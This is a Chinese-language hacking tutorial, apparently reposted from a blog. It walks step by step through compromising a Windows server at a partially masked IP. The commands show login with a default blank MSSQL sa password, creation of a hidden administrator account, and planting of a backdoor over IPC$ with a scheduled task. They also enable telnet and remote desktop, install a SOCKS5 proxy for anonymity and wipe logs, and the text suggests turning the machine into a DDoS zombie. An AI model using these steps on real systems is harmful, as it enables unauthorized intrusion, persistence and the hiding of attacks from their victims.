一次详细全面的***报告
注: 肉雞為你已經得到權限的計算機
跳板則是在肉雞的基礎上被你做過內容,以方便自已的計算機
肉雞: 211.75.X.X
事情發現在一個深夜.外面黑的嚇死人,只有我的房間還亮著燈,我穿著一件黑色的大T 恤
按照網站論壇上的提示,211.75.X.X的USER為administrato,PASSWD為空,方式IPC連接
習慣性的先PING了一下該網站
C:\>ping 211.75.X.X
Pinging iceblood.yofor.com [211.75.X.X] with 32 bytes of data:
Reply from 211.75.X.X: bytes=32 time<10ms TTL=254
Reply from 211.75.X.X: bytes=32 time<10ms TTL=254
Reply from 211.75.X.X: bytes=32 time<10ms TTL=254
Reply from 211.75.X.X: bytes=32 time<10ms TTL=254
Ping statistics for 211.75.X.X:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in
milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
看來網站開通,那就按提示IPC連接吧
注: IPC$(Internet Process Connection)是共享"命名管道"的資源(大家都是這么說的),它是為了讓進程間通信而開放的命名管道,可以通過驗證用戶名和密碼獲得相應的權限,在遠程管理計算機和查看計算機的共享資源時使用。
C:\>net use \\211.75.X.X\IPC$ "" /user:"admintitrators"
系統發生1326錯誤
登陸失敗:未知的用戶名或錯誤密碼
我暈,看來前來的兄弟將密碼改了,還是自已動手吧
流光出場,看看可以掃到點什么有用的東東.十分鐘后,流光掃描報告顯示
PORT-> 主機 211.75.X.X 端口 0139 ...開放
PORT-> 主機 211.75.X.X 端口 0443 ...開放
PORT-> 主機 211.75.X.X 端口 080 ...開放
PORT-> 主機 211.75.X.X 端口 1433 ...開放
.........
最下面探測到了流光的默認MSSQL密碼為SA
哈哈,這回有的玩了
打開SuperSQLEXEC,在IP中填上211.75.X.X,在USER中輸入sa ,連接
稍等一會,出來了,我們現在利用了MSSQL的默認密碼這個漏洞進入倒對方的系統了
c:\net user
admin administrator user aa bb
lqh test xxxxx ldir like
看來這臺機子上有不少USER,反正也不差咱們一個了,
c:\net user kawen kawen /add
命令成功
c:\net localgroup administrators kawen /add
命令成功
OK,我們現在已成功的將KAWEN這個用戶名加到管理員中去了.
退出SQL,我們現在又要轉到IPC這邊來了,打開DOS
C:\>net use \\211.75.X.X\IPC$ "kawen" /user:"kawen"
命令完成
呵呵,看到沒有,我們已經和對方IPC上了
現在要做的就是提升權限了,當然你可以用DameWare Mini Remote Control直接通過圖形方式連上對方的計算機,就像3389一樣.
C:\>copy srv.exe \\211.75.X.X\admin$
C:\>net time \\211.75.X.X
C:\>at \\211.75.X.X 11:05 srv.exe
以上三步是我們要啟動可以打開99端口的后門軟件SRV.EXE
C:\>net time \\211.75.X.X
再查查到時間沒有?如果211.75.X.X 的當前時間是 2002/6/1 上午 11:05,那就準備開始下面的命令
C:\>telnet 211.75.X.X 99
C:\WINNT\system32
成功了,不過SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務,也就是打開對方的23端口
copy ntlm.exe \\211.75.X.X\admin$
OK,我們直接運行C:\WINNT\system32>ntlm
當出現"DONE"的時候,就說明已經啟動正常
然后我們使用net start telnet直接啟動TELNET服務
OK,現在我們已經利用IPC進來了
下一步就是開一個3389端口,可以以圖形方式直接登陸
請按以下步驟輸入開啟3389
c:\>query user
c:\>echo [Components] > c:\kawen
c:\>echo TSEnable = on >> c:\kawen
//這是建立無人參與的安裝參數
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\kawen /q
如果沒有意外的話,幾分鐘計算機就會重啟, 我們就可以利用3389的客戶端連上去了
到這里為止我們通過MSSQL,IPC,99端口及TELNET后后又建立了3389端口,現在這臺計算機我們已基本控制了,現在還要做的就是建立一個代理服務器,以便我們可以在網上做到踏雪無痕,
代理服務器的首選應該是SkSockServer
怎么上傳到我們控制的計算機中呢,其實有多種方法,我們不是開了對方的23端口了嗎
telnet上去
TELNET 211.75.X.X
C:\WINNT\SYSTEM32\NET SHARE C$
這一條命令是開對方的共享,然后在本機上的開始運行中直接鍵入\\211.75.X.X就可以連上了,將SkSockServer拖到對方的C盤中就可以了.另外我們還可以利用流光的種植者直接種上去,也很簡單
明白了吧
傳上去后
c:\winnt\system32\sksockserver -install
開始安裝SKSOCKSERVER
c:\winnt\system32\sksockserver -config starttype 2
c:\winnt\system32\sksockserver -config port 8888
c:\winnt\system32\net start skserver
這樣我們就開啟了一個端口為8888的SOCK5代理服務器,放在你的QQ上用吧
現在算來,該做的也差不多了,是到要走的時候了,清掃一下吧
這一步在這里比較簡單了,推薦使用SSSO-Friend,一款圖形界面的軟件,他會幫你清掉你的PP,很簡單
要的話聯系我吧或是到down.chinaehacker.net下載
到這里教程也完了
總結一下,我們用了SQL,IPC,共享,開了99端口,23端口,3389端口,最后還做了一個SOCK5的代理服務器.其實運用上面的手法,你還可以做TFTP服務器,做成用于DDOS***的傀儡機器等等.沒什么技術含量,只是想告訴各位一個最簡單的道理,多看書,多運用,將本身不相關的東西相連起來,就會成為一個完整的圓.
?
轉載于:https://blog.51cto.com/caixj/620072
與50位技術專家面對面20年技術見證,附贈技術全景圖總結
以上是生活随笔為你收集整理的一次详细全面的***报告的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 西德和东德的区别(西德)
- 下一篇: juniper srx解决内网不能tel